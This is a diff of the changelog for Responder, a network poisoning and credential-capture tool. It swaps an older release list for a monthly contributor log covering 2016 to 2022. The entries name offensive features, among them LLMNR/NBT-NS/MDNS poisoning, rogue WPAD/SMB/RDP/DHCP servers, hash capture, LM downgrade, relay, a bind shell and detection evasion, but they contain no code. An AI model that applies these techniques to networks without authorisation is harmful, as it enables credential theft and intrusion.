-## [v2.3.2.2](https://github.com/lgandx/Responder/releases/tag/v2.3.2.2) - 2016-09-12
-
-[Compare with v2.3.2.1](https://github.com/lgandx/Responder/compare/v2.3.2.1...v2.3.2.2)
-
-### Added
-
-- Added support for webdav, auto credz. ([ad9ce6e](https://github.com/lgandx/Responder/commit/ad9ce6e659ffd9dd31714260f906c8de02223398) by lgandx).
-- Added option -e, specify an external IP address to redirect poisoned traffic to. ([04c270f](https://github.com/lgandx/Responder/commit/04c270f6b75cd8eb833cca3b71965450d925e6ac) by lgandx).
-
-### Removed
-
-- removed debug info ([3e2e375](https://github.com/lgandx/Responder/commit/3e2e375987ce2ae03e6a88ffadabb13823ba859c) by lgandx).
-
-## [v2.3.2.1](https://github.com/lgandx/Responder/releases/tag/v2.3.2.1) - 2016-09-11
-
-[Compare with v2.3.2](https://github.com/lgandx/Responder/compare/v2.3.2...v2.3.2.1)
-
-## [v2.3.2](https://github.com/lgandx/Responder/releases/tag/v2.3.2) - 2016-09-11
-
-[Compare with v2.3.1](https://github.com/lgandx/Responder/compare/v2.3.1...v2.3.2)
-
-### Added
-
-- Added proxy auth server + various fixes and improvements ([82fe64d](https://github.com/lgandx/Responder/commit/82fe64dfd988321cbc1a8cb3d8f01caa38f4193e) by lgandx).
-- Added current date for all HTTP headers, avoiding easy detection ([ecd62c3](https://github.com/lgandx/Responder/commit/ecd62c322f48eadb235312ebb1e57375600ef0f1) by lgandx).
-
-### Removed
-
-- Removed useless HTTP headers ([881dae5](https://github.com/lgandx/Responder/commit/881dae59cf3c95047d82b34208f57f94b3e85b04) by lgandx).
-
-## [v2.3.1](https://github.com/lgandx/Responder/releases/tag/v2.3.1) - 2016-09-09
-
-[Compare with v2.3.0](https://github.com/lgandx/Responder/compare/v2.3.0...v2.3.1)
-
-### Added
-
-- Added SMBv2 support enabled by default. ([85d7974](https://github.com/lgandx/Responder/commit/85d7974513a9b6378ed4c0c07a7dd640c27ead9b) by lgandx).
-- added new option, for Config-Responder.log file. ([a9c2b29](https://github.com/lgandx/Responder/commit/a9c2b297c6027030e3f83c7626fff6f66d5a4f1b) by lgaffie).
-- Add compatability with newer net-tools ifconfig. ([e19e349](https://github.com/lgandx/Responder/commit/e19e34997e68a2f567d04d0c013b7870530b7bfd) by Hank Leininger).
-- Add HTTP Referer logging ([16e6464](https://github.com/lgandx/Responder/commit/16e6464748d3497943a9d96848ead9058dc0f7e9) by Hubert Seiwert).
-- Added recent Windows versions. ([6eca29d](https://github.com/lgandx/Responder/commit/6eca29d08cdd0d259760667da0c41e76d2cd2693) by Jim Shaver).
-- Added: Support for OSx ([59e48e8](https://github.com/lgandx/Responder/commit/59e48e80dd6153f83899413c2fc71a46367d4abf) by lgandx).
-
-### Fixed
-
-- Fixed colors in log files ([d9258e2](https://github.com/lgandx/Responder/commit/d9258e2dd80ab1d62767377250c76bf5c9f2a50d) by lgaffie).
-- Fixed the regexes for Authorization: headers. ([a81a9a3](https://github.com/lgandx/Responder/commit/a81a9a31e4dbef2890fbf51830b6a9374d6a8f8a) by Hank Leininger).
-- Fix Windows 10 support. ([a84b351](https://github.com/lgandx/Responder/commit/a84b3513e1fdd47025ceaa743ce0f506f162640b) by ValdikSS).
-- Fixed color bug in Analyze mode ([04c841d](https://github.com/lgandx/Responder/commit/04c841d34e0d32970f08ae91ad0f931b1b90d6ab) by lgandx).
-- fixed minor bug ([6f8652c](https://github.com/lgandx/Responder/commit/6f8652c0fccfe83078254d7b38cb9fd517a6bf42) by lgandx).
-- Fixed Icmp-Redirect.. ([df63c1f](https://github.com/lgandx/Responder/commit/df63c1fc138d1682a86bc2114a5352ae897865c6) by lgandx).
-- Fixed some tools and +x on some executables ([8171a96](https://github.com/lgandx/Responder/commit/8171a96b9eaac3cd25ef18e8ec8b303c5877f4d0) by lgandx).
-- Fix generation of HTTP response in HTTP proxy ([b2830e0](https://github.com/lgandx/Responder/commit/b2830e0a4f46f62db4d34b3e8f93ea505be32000) by Antonio Herraiz).
-- Fix misspelling of poisoners ([6edc01d](https://github.com/lgandx/Responder/commit/6edc01d8511189489e4b5fd9873f25712920565c) by IMcPwn).
-
-### Changed
-
-- change IsOSX to utils.IsOsX. Fixes #89 ([08c3a90](https://github.com/lgandx/Responder/commit/08c3a90b400d0aff307dd43ff4cd6f01ca71a6cb) by Jared Haight).
-- Changed email address ([f5a8bf0](https://github.com/lgandx/Responder/commit/f5a8bf0650bc088b6ef5ae7432f2baef0d52852c) by lgandx).
-- Changed connection to SQlite db to support different encoded charsets ([0fec40c](https://github.com/lgandx/Responder/commit/0fec40c3b4c621ee21a88906e77c6ea7a56cb8a9) by Yannick Méheut).
-- Changed comment to be more clear about what is being done when logging ([08535e5](https://github.com/lgandx/Responder/commit/08535e55391d762be4259a1fada330ef3f0ac134) by Yannick Méheut).
-
-### Removed
-
-- Removed the config dump in Responder-Session.log. New file gets created in logs, with host network config such as dns, routes, ifconfig and config dump ([a765a8f](https://github.com/lgandx/Responder/commit/a765a8f0949de37940364d0a228aff72c0701aa0) by lgaffie).
-
-## [v2.3.0](https://github.com/lgandx/Responder/releases/tag/v2.3.0) - 2015-09-11
-
-[Compare with v2.1.4](https://github.com/lgandx/Responder/compare/v2.1.4...v2.3.0)
-
-### Added
-
-- Added support for Samba4 clients ([ee033e0](https://github.com/lgandx/Responder/commit/ee033e0c7f28a0584c8ebcb2c31fe949581f0022) by lgandx).
-- Added support for upstream proxies for the rogue WPAD server ([f4bd612](https://github.com/lgandx/Responder/commit/f4bd612e083698fd94308fd2fd15ba7d8d289fd8) by jrmdev).
-
-### Fixed
-
-- Fixed Harsh Parser variable typo ([5ab431a](https://github.com/lgandx/Responder/commit/5ab431a4fe24a2ba4666b9c51ad59a0bb8a0053d) by lgandx).
-- fixed var name ([62ed8f0](https://github.com/lgandx/Responder/commit/62ed8f00626a2ad0fbbfb845e808d77938f4513a) by byt3bl33d3r).
-- Fixes MDNS Name parsing error ([3261288](https://github.com/lgandx/Responder/commit/3261288c82fee415dd8e1ba64b80596ef97da490) by byt3bl33d3r).
-- Fixed FTP module. ([75664a4](https://github.com/lgandx/Responder/commit/75664a4f37feb897be52480223cd1633d322ede8) by jrmdev).
-- Fixing a bug in HTTP proxy, was calling recv() too many times ([ddaa9f8](https://github.com/lgandx/Responder/commit/ddaa9f87674dc8ac3f9104196f2f92cdec130682) by lanjelot).
-
-### Changed
-
-- changed operand ([cb9c2c8](https://github.com/lgandx/Responder/commit/cb9c2c8b97761cc5e00051efd74c9c3fdaf5762d) by byt3bl33d3r).
-
-## [v2.1.4](https://github.com/lgandx/Responder/releases/tag/v2.1.4) - 2014-12-06
-
-[Compare with v2.1.3](https://github.com/lgandx/Responder/compare/v2.1.3...v2.1.4)
-
-### Added
-
-- Added: FindSMB2UPTime script. Find when is the last time a >= 2008 server was updated. ([7a95ef1](https://github.com/lgandx/Responder/commit/7a95ef1474d3cea88680f359581aa89a4e9c30f5) by lgandx).
-
-## [v2.1.3](https://github.com/lgandx/Responder/releases/tag/v2.1.3) - 2014-11-27
-
-[Compare with v2.1.2](https://github.com/lgandx/Responder/compare/v2.1.2...v2.1.3)
-
-### Added
-
-- Added: DontRespondToName and DontRespondTo; NAC/IPS detection evasion ([36ef78f](https://github.com/lgandx/Responder/commit/36ef78f85aea5db33f37a6d1d73bf3bb7f82336f) by lgandx).
-- Added --version and kost's fix for /etc/resolv.conf empty lines parsing. ([c05bdfc](https://github.com/lgandx/Responder/commit/c05bdfce17234b216b408080d9aba5db443de507) by lgandx).
-
-## [v2.1.2](https://github.com/lgandx/Responder/releases/tag/v2.1.2) - 2014-08-26
-
-[Compare with v2.1.0](https://github.com/lgandx/Responder/compare/v2.1.0...v2.1.2)
-
-### Added
-
-- Added: Log command line in Responder-Session.log. ([f69e93c](https://github.com/lgandx/Responder/commit/f69e93c02e81a83309d3863f6d5680b36378a16b) by lgandx).
-
-### Fixed
-
-- Fixed serve-always and serve-exe with the new WPAD server. ([cf7b477](https://github.com/lgandx/Responder/commit/cf7b4771caf335a1a283fae08923c413acae3343) by lgandx).
-
-## [v2.1.0](https://github.com/lgandx/Responder/releases/tag/v2.1.0) - 2014-08-16
-
-[Compare with v2.0.9](https://github.com/lgandx/Responder/compare/v2.0.9...v2.1.0)
-
-### Fixed
-
-- fixed: identation. ([5c9fec9](https://github.com/lgandx/Responder/commit/5c9fec923c8cb77f00466db6192b1ecb8980bdcf) by lgandx).
-
-## [v2.0.9](https://github.com/lgandx/Responder/releases/tag/v2.0.9) - 2014-05-28
-
-[Compare with v2.0.8](https://github.com/lgandx/Responder/compare/v2.0.8...v2.0.9)
-
-### Fixed
-
-- Fixed high cpu usage in some specific cases ([4558861](https://github.com/lgandx/Responder/commit/4558861ce2dd56c0e4c5157437c8726a26e382c5) by lgandx).
-
-### Removed
-
-- Removed: old style options. Just use -r instead of -r On ([a21aaf7](https://github.com/lgandx/Responder/commit/a21aaf7987e26eee5455d68cd76ff56b5466b7f2) by lgandx).
-
-## [v2.0.8](https://github.com/lgandx/Responder/releases/tag/v2.0.8) - 2014-04-22
-
-[Compare with v2.0.7](https://github.com/lgandx/Responder/compare/v2.0.7...v2.0.8)
-
-### Added
-
-- Added: in-scope target, windows >= Vista support (-R) and unicast answers only. ([2e4ed61](https://github.com/lgandx/Responder/commit/2e4ed61bba2df61a1e1165b466a369639c425955) by lgandx).
-
-## [v2.0.7](https://github.com/lgandx/Responder/releases/tag/v2.0.7) - 2014-04-16
-
-[Compare with v2.0.6](https://github.com/lgandx/Responder/compare/v2.0.6...v2.0.7)
-
-### Added
-
-- Added: in-scope llmnr/nbt-ns name option ([1c79bed](https://github.com/lgandx/Responder/commit/1c79bedac9083992ba019ff7134cdb3c718a6f15) by lgandx).
-- Added: Kerberos server and -d cli option. ([dcede0f](https://github.com/lgandx/Responder/commit/dcede0fdf5e060e77fc51fbad2da3dbbff8edf8d) by lgandx).
-
-## [v2.0.6](https://github.com/lgandx/Responder/releases/tag/v2.0.6) - 2014-04-01
-
-[Compare with v2.0.5](https://github.com/lgandx/Responder/compare/v2.0.5...v2.0.6)
-
-### Fixed
-
-- Fixed [Enter] key issue ([c97a13c](https://github.com/lgandx/Responder/commit/c97a13c1bdb79b4dcdf43f889fdd586c3c39b893) by lgandx).
-
-## [v2.0.5](https://github.com/lgandx/Responder/releases/tag/v2.0.5) - 2014-03-22
-
-[Compare with v2.0.4](https://github.com/lgandx/Responder/compare/v2.0.4...v2.0.5)
-
-### Added
-
-- Added: In-scope IP handling for MDNS ([b14ff0b](https://github.com/lgandx/Responder/commit/b14ff0b36a100736f293ddbd8bbe1c538a370347) by lgandx).
-
-## [v2.0.4](https://github.com/lgandx/Responder/releases/tag/v2.0.4) - 2014-03-22
-
-[Compare with v2.0.3](https://github.com/lgandx/Responder/compare/v2.0.3...v2.0.4)
-
-### Added
-
-- Added: MDNS Poisoner ([90479ad](https://github.com/lgandx/Responder/commit/90479adcca066602885ea2bfec32953ce71d6977) by lgandx).
-
-## [v2.0.3](https://github.com/lgandx/Responder/releases/tag/v2.0.3) - 2014-03-21
-
-[Compare with v2.0.2](https://github.com/lgandx/Responder/compare/v2.0.2...v2.0.3)
-
-### Fixed
-
-- fix: Bind to interface bug. ([a1a4f46](https://github.com/lgandx/Responder/commit/a1a4f46c7ba8861ff71c1ea2045a72acf2c829bd) by lgandx).
-
-## [v2.0.2](https://github.com/lgandx/Responder/releases/tag/v2.0.2) - 2014-02-06
-
-[Compare with v2.0.1](https://github.com/lgandx/Responder/compare/v2.0.1...v2.0.2)
-
-### Added
-
-- Added: Analyze mode; Lanman Domain/SQL/Workstation passive discovery. ([2c9273e](https://github.com/lgandx/Responder/commit/2c9273eb2ca8d5080ff81273f602547fe649c259) by lgandx).
-
-## [v2.0.1](https://github.com/lgandx/Responder/releases/tag/v2.0.1) - 2014-01-30
-
-[Compare with first commit](https://github.com/lgandx/Responder/compare/e821133708098c74497a3f9b0387a3ad048d5a48...v2.0.1)
-
-### Added
-
-- Added: Analyze ICMP Redirect plausibility on current subnet. ([06df704](https://github.com/lgandx/Responder/commit/06df704960c556e3c2261a52827d55eb7b4ed0d4) by lgandx).
-- Added: Analyze stealth mode. See all traffic, but dont answer (-A cli). Minor bugs also fixed. ([9bb2f81](https://github.com/lgandx/Responder/commit/9bb2f81044cd94f36f54c8daf7f1183bc761bb24) by lgandx).
-- Added: -F command line switch to force authentication on PAC file retrieval. Default is Off ([3f48c11](https://github.com/lgandx/Responder/commit/3f48c114d5e713bfe68bef1717e18d3c266f358e) by lgandx).
-- Added: IMAP module and enhanced wpad. ([af60de9](https://github.com/lgandx/Responder/commit/af60de95679f20eca4765b1450f80c48fbef689c) by lgandx).
-- Added: SMTP PLAIN/LOGIN module ([6828f1b](https://github.com/lgandx/Responder/commit/6828f1b11ebfc0fc25a8fd00e8f373f3adfb7fc6) by lgandx).
-- Added: POP3 module. ([f48ea3f](https://github.com/lgandx/Responder/commit/f48ea3f4b644c3eb25c63d402c6d30fcd29be529) by lgandx).
-- Added: MSSQL Plaintext module ([4c3a494](https://github.com/lgandx/Responder/commit/4c3a494c86b7a95cf2c43a71bac182f231bf71cb) by lgandx).
-- Added: SMBRelay module ([4dd9d8c](https://github.com/lgandx/Responder/commit/4dd9d8c1df3717ed928e73083c30e21aa5eaf8b4) by lgandx).
-- added: Command switch -v for verbose mode. Responder is now less verbose. ([46b98a6](https://github.com/lgandx/Responder/commit/46b98a616d540ae618198784d0775e687371858e) by lgandx).
-- Added support for .pac file requests. ([6b7e5b6](https://github.com/lgandx/Responder/commit/6b7e5b6441c7fdf19a163b8efb6fd588ccfee8ae) by lgandx).
-- Added: print HTTP URL, POST data requested prior auth ([f616718](https://github.com/lgandx/Responder/commit/f6167183e046d2759ab6b885dd2f94bb2902c564) by lgandx).
-- Added command switch -I. This option override Responder.conf Bind_to setting ([68de4ac](https://github.com/lgandx/Responder/commit/68de4ac26ec34bbf24524abb0c0b11ae34aa27a3) by lgandx).
-- Added: in-scope only target. See Responder.conf. ([0465bd6](https://github.com/lgandx/Responder/commit/0465bd604d7cc22ef2c97f938d8564677030e5bd) by lgandx).
-- Added: Fake access denied html page ([9b608aa](https://github.com/lgandx/Responder/commit/9b608aad30529e2bfea4d7c6e99343df0ba2d9d0) by lgandx).
-- Added: Configuration file, removed several cli options and several fixes. ([95eed09](https://github.com/lgandx/Responder/commit/95eed099424568d4c67402f12a5de5d9d72c3041) by lgandx).
-- Added: Configuration file for Responder ([d573102](https://github.com/lgandx/Responder/commit/d57310273df524b99d17c97b49ee35eb3aec7b52) by lgandx).
-- Added: Bind shell listening on port 140, use it with -e or -exe option if needed ([1079de0](https://github.com/lgandx/Responder/commit/1079de052b7cc7c6caeb80e6ee081568ff359317) by Lgandx).
-- Added: Ability to serve whatever kind of file via HTTP and WPAD There's now 3 new options. ([a8c2952](https://github.com/lgandx/Responder/commit/a8c29522db3555f7733a80d29271b3229e1149c6) by Lgandx).
-- added -I option to bind all sockets to a specific ip (eg: listen only on eth0) ([d5088b2](https://github.com/lgandx/Responder/commit/d5088b24ee3d8bead640b37480be57fe564e70b5) by Lgandx).
-- added: HTTP auth forward to SMB. This is useful for SMB Relay or LM downgrade from HTTP NTLM ESS to SMB LM. ([0fcaa68](https://github.com/lgandx/Responder/commit/0fcaa68c074e496edb2164ca35659ff636b5a361) by Lgandx).
-- added automatic poisoning mode when a primary and a secondary DNS is specified. ([ccbbbe3](https://github.com/lgandx/Responder/commit/ccbbbe34535c12b664a39f5a99f98c1da79ca5a6) by Lgandx).
-- Added HTTPS module. ([9250281](https://github.com/lgandx/Responder/commit/92502814aa3becdd064f0bfb160af826adb42f60) by Lgandx).
-- Added support for LM hash downgrade. Default still NTLMSSP. ([09f8f72](https://github.com/lgandx/Responder/commit/09f8f7230d66cb35e1e6bed9fb2c9133ad5cc415) by Lgandx).
-- Added: Client ip is now part of the cookie filename ([2718f9c](https://github.com/lgandx/Responder/commit/2718f9c51310e18e91d6d90c86657bdd72889f2a) by Lgandx).
-- Added a folder for storing HTTP cookies files ([d1a14e2](https://github.com/lgandx/Responder/commit/d1a14e2f27d856ca1551232502835d6cddb3602d) by Lgandx).
-- Added WPAD transparent proxy ([9f1c3bc](https://github.com/lgandx/Responder/commit/9f1c3bcba32c6feb008a39ece688522dcd9e757f) by Lgandx).
-
-### Fixed
-
-- Fixed WPAD cookie capture ([afe2b63](https://github.com/lgandx/Responder/commit/afe2b63c6a556a6da97e7ac89c96f89276d521c3) by lgandx).
-- Fix: Command line switch typo ([4fb4233](https://github.com/lgandx/Responder/commit/4fb4233424273849085781225298de39b6c9c098) by lgandx).
-- Fixed minor bugs ([f8a16e2](https://github.com/lgandx/Responder/commit/f8a16e28ee15a3af91542269e5b1ec9c69ea3d75) by Lgandx).
-- Fixed duplicate entry in hash file for machine accounts ([4112b1c](https://github.com/lgandx/Responder/commit/4112b1cd5d06f021dcc145f32d29b53d4cb8d82a) by Lgandx).
-- fix for anonymous NTLM connection for LDAP server ([1c47e7f](https://github.com/lgandx/Responder/commit/1c47e7fcb112d0efdb509e56a1b08d557eb9f375) by Lgandx).
-
-### Changed
-
-- Changed WPAD to Off by default. Use command line -w On to enable. ([bf2fdf0](https://github.com/lgandx/Responder/commit/bf2fdf083cdadf81747f87eb138a474911928b77) by lgandx).
-- changed .txt to no extension. ([5f7bfa8](https://github.com/lgandx/Responder/commit/5f7bfa8cbe75d0c7fd24c8a83c44a5c3b02717a4) by lgandx).
-- Changed Windows =< 5.2 documentation to XP/2003 and earlier for clarification ([56dd7b8](https://github.com/lgandx/Responder/commit/56dd7b828cf85b88073e88a8b4409f7dae791d49) by Garret Picchioni).
-
-### Removed
-
-- Removed bind to interface support for OsX. Responder for OsX can only listen on all interfaces. ([dbfdc27](https://github.com/lgandx/Responder/commit/dbfdc2783156cfeede5114735ae018a925b3fa78) by lgandx).
+*In compliance with the [GPL-3.0](https://opensource.org/licenses/GPL-3.0) license: I declare that this version of the program contains my modifications, which can be seen through the usual "git" mechanism.*
+
+
+2022-08
+Contributor(s):
+lgandx
+>Added: append .local TLD to DontRespondToNames + MDNS bug fix
+>Merge pull request #199 from gblomqvist/masterFix double logging of first hash/cleartext when CaptureMultipleHashFromSameHost = On
+>Modified wpad script
+>fixed the RespondTo/DontRespondTo issue
+>Merge pull request #210 from 0xjbb/masterAdded Quiet Mode
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2022-07
+Contributor(s):
+jb
+lgandx
+>Minor bugs and display/logging fixes + RDP srv SSLwrapping fix
+>Fixed: Warnings on python 3.10
+>Added Quiet mode
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2022-05
+Contributor(s):
+lgandx
+>removed -r reference from help msg.
+>removed -r references
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2022-04
+Contributor(s):
+Gustaf Blomqvist
+>Fix double logging of first hash or cleartext
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2022-02
+Contributor(s):
+Tom Aviv
+Andrii Nechytailov
+kitchung
+lgandx
+>Merge pull request #190 from kitchung/kitchung-patch-1DE-RPC server status not correct
+>DE-RPC server status not correct #189Line 512 should read:
+print(' %-27s' % "DCE-RPC server" + (enabled if settings.Config.DCERPC_On_Off else disabled))
+
+Instead of:
+print(' %-27s' % "DCE-RPC server" + (enabled if settings.Config.RDP_On_Off else disabled))
+>MutableMapping was moved to collections.abc
+>Merge pull request #191 from Mipsters/masterMutableMapping was moved to collections.abc
+>Fixed options formating in README
+>Merge pull request #188 from Ne4istb/patch-1Fixed options formating in README
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2022-01
+Contributor(s):
+lgandx
+root
+>Updated the README and Responder help flags
+>Merge pull request #185 from ajkerley628/masterUpdated the README and Responder help flags
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2021-12
+Contributor(s):
+lgandx
+>Added IPv6 support
+>Updated the Readme file with the new options and removed some old stuff
+>Added date and time for each Responder session config log.
+>Remove analyze mode on DNS since you need to ARP to get queries
+>Removed the static certs and added automatic cert generation
+>added DHCP db & updated the report script to reflect that
+>Added DHCP DNS vs WPAD srv injection
+>Merge pull request #136 from ghost/patch-2Correct Analyze log filename
+>added support for OPT EDNS
+>Added DHCP DNS vs DHCP WPAD
+>Fixed the ON/OFF for poisoners when in Analyze mode.
+>minor display fix.
+>added the ability to provide external IP on WPAD poison via DHCP
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2021-11
+Contributor(s):
+lgandx
+>DHCP: Added auto WPADscript configuration with our IP instead of hardcoded NBT string
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2021-10
+Contributor(s):
+lgandx
+>Added DHCP server
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2021-05
+Contributor(s):
+Pixis
+lgandx
+pixis
+>minor fix
+>Add ESS disabling information
+>Add --lm switch for ESS downgrade
+>Add ESS downgrade parameter
+>Merge pull request #163 from Hackndo/masterAdd ESS downgrade parameter
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2021-04
+Contributor(s):
+lgandx
+>forgot to add packets.py
+>Added WinRM rogue server
+>Added dce-rpc module + enhancements + bug fix.
+>removed addiontional RR on SRV answers
+>Update README.md
+>Update README.mdAdded Synacktiv as major donor.
+>Added DNS SRV handling for ldap/kerberos + LDAP netlogon ping
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2021-03
+Contributor(s):
+lgandx
+>Removed donation banner
+>minor fix
+>Ported to py3
+>added a check for exec file
+>made compatible py2/py3
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2021-02
+Contributor(s):
+lgandx
+>added donation address and minor typo
+>Added donation banner.
+>added smb filetime support
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2020-12
+Contributor(s):
+lgandx
+>Merge pull request #145 from khiemdoan/fix-syntaxFix wrong syntax
+>Merge pull request #135 from LabanSkollerDefensify/patch-1Fix typos in README
+>Added SMB2 support for RunFinger and various other checks.
+>Merge pull request #138 from ThePirateWhoSmellsOfSunflowers/fix_challengefix custom challenge in python3
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2020-11
+Contributor(s):
+Khiem Doan
+>Fix wrong syntax
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2020-10
+Contributor(s):
+ThePirateWhoSmellsOfSunflowers
+>small fix
+>fix custom challenge in python3
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2020-09
+Contributor(s):
+nickyb
+Laban Sköllermark
+lgandx
+>Merge pull request #133 from NickstaDB/fix-bind-addressUse settings.Config.Bind_To as bind address.
+>Fixed LLMNR/NBT-NS/Browser issue when binding to a specific interface
+>Fix typos in README* Missing "is" in description of the tool
+* s/an unique/a unique/ since it starts with a consonant sound
+* Move a word to its correct place
+>Correct Analyze log filenameThe default filename for Analyze logs is Analyzer-Session.log, not
+Analyze-Session.log.
+>Use settings.Config.Bind_To as bind address.
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2020-08
+Contributor(s):
+lgandx
+>python3.8 compability fix
+>py3 bugfix
+>version update
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2020-02
+Contributor(s):
+lgandx
+Sophie Brun
+>Fix encoding issue in Python 3
+>Merge pull request #117 from sbrun/masterFix encoding issue in Python 3
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2020-01
+Contributor(s):
+lgandx
+>Added py3 and py2 compatibility + many bugfix
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2019-08
+Contributor(s):
+lgandx
+>Added RDP rogue server
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2019-05
+Contributor(s):
+lgandx
+>Merge pull request #92 from Crypt0-M3lon/masterFix socket timeout on HTTP POST requests
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2019-02
+Contributor(s):
+Crypt0-M3lon
+>Fix socket timeout on HTTP POST requestsRemaining size should be checked at the end of the loop, the current implementation hang when POST request Content-Lenght is 0.
+We want to check for Content-Length header only if we received full header.
+>Merge pull request #1 from Crypt0-M3lon/Crypt0-M3lon-patch-1Fix socket timeout on HTTP POST requests
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2019-01
+Contributor(s):
+Clément Notin
+lgandx
+>Merge pull request #89 from cnotin/patch-1Replace ParseSMB2NTLMv2Hash() by ParseSMBHash() to handle NTLMv1 and NTLMv2
+>Replace ParseSMB2NTLMv2Hash() by ParseSMBHash() to handle NTLMv1 and NTLMv2
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2018-11
+Contributor(s):
+lgandx
+>removed debug string
+>Merge pull request #86 from mschader/patch-1Update README.md: Fix typo
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2018-10
+Contributor(s):
+Markus
+>Update README.md: Fix typoFixed just a tiny typo.
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2018-08
+Contributor(s):
+Clément Notin
+lgandx
+>Fix version number in settings.py
+>Fix multi HTTP responses
+>Merge pull request #83 from cnotin/patch-2Fix multi HTTP responses
+>Merge pull request #80 from myst404/masterBetter handling of cleartext credentials
+>Merge pull request #82 from cnotin/patch-1Fix version number in settings.py
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2018-06
+Contributor(s):
+myst404
+>Better handling of cleartext credentials
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2017-11
+Contributor(s):
+Lionel PRAT
+lgandx
+>Add ignore case on check body for html inject
+>Merge pull request #67 from lprat/masterAdd ignore case on check body for html inject
+>Merge pull request #51 from watersalesman/masterFixed instances of "CRTL-C" to "CTRL-C"
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2017-09
+Contributor(s):
+lgandx
+>Changed the complete LDAP parsing hash algo (ntlmv2 bug).
+>Fixed various bugs and improved the LDAP module.
+>Several Bugfix
+>added support for plain auth
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2017-08
+Contributor(s):
+OJ
+lgandx
+>Pass Challenge value to the LDAP parsing function
+>Merge pull request #61 from OJ/fix-ldap-hash-parsingPass Challenge value to the LDAP parsing function
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2017-07
+Contributor(s):
+lgandx
+>Merge pull request #58 from megabug/mssql-browserAdd Microsoft SQL Server Browser responder
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2017-06
+Contributor(s):
+Matthew Daley
+>Add Microsoft SQL Server Browser responderWhen connecting to a named instance, a SQL client (at least SQL ServerNative Client) will send a request (namely a CLNT_UCAST_INST message) tothe server's SQL Server Browser service for instance connectioninformation. If it gets no response, the connection attempt fails.By adding a SQL Server Browser responder for these requests, we ensurethat connections are successfully made to the SQL Server responder forhash capture.As per the comment, this is based on the document "[MC-SQLR]: SQL ServerResolution Protocol", currently available at.
+>Update README.md with new SQL Browser port usage
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2017-04
+Contributor(s):
+Randy Ramos
+>Fixed instances of "CRTL-C" to "CTRL-C"
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2017-03
+Contributor(s):
+lgandx
+>Fixed bug in FindSMB2UPTime
+>Removed Paypal donation link.
+>updated readme
+>MultiRelay 2.0 Release
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2017-02
+Contributor(s):
+skelsec
+lgandx
+Gifts
+>Fix for RandomChallenge function. Function getrandbits can return less than 64 bits, thus decode('hex') will crash with TypeError: Odd-length string
+>minor fix
+>Merge pull request #25 from joshuaskorich/masteradded `ip` commands in addition to ifconfig and netstat
+>SimpleSSL
+>making HTTP great again
+>Merge pull request #32 from Gifts/fix_randchallengeFix for RandomChallenge function.
+>cleaning up comments
+>Added: Hashdump, Stats report
+>fixed crash: typo.
+>Merge pull request #33 from skelsec/masterFixing HTTP header issue
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2017-01
+Contributor(s):
+thejosko
+lgandx
+>Added: Random challenge for each requests (default)
+>added `ip` commands in addition to ifconfig and netstat
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2016-12
+Contributor(s):
+lgandx
+>Added paypal button
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2016-11
+Contributor(s):
+lgandx
+>Added: BTC donation address
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2016-10
+Contributor(s):
+Nikos Vassakis
+lgandx
+>Fixed wrong challenge issue
+>Fixed the bind to interface issue (https://github.com/lgandx/Responder/issues/6)
+>Changed to executable
+>fixed bug in hash parsing.
+>updated version number
+>Patch for Android 4.x terminals that are missing some linux commands
+>Fix values for win98 and win10 (requested here: https://github.com/lgandx/Responder/pull/7/commits/d9d34f04cddbd666865089d809eb5b3d46dd9cd4)
+>Updated versions
+>Minor fix
+>Merge pull request #14 from nvssks/masterPatch for Android 4.x terminals that are missing some linux commands
+>updated to current version.
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+2016-09
+Contributor(s):
+lgaffie
+lgandx
+>bug: removed loop, while connection handled by basehttpserver
+>updated version
+>Added proxy auth server + various fixes and improvements
+>Added SMBv2 support enabled by default.
+>minor fix
+>Added support for webdav, auto credz.
+>Added current date for all HTTP headers, avoiding easy detection
+>removed debug info
+>Added option -e, specify an external IP address to redirect poisoned traffic to.
+>Config dumped independently. Responder-Session.log is now a clean file.
+>Reflected recent changes.
+>Removed the config dump in Responder-Session.log. New file gets created in logs, with host network config such as dns, routes, ifconfig and config dump
+>minor bug fix
+>Fixed colors in log files
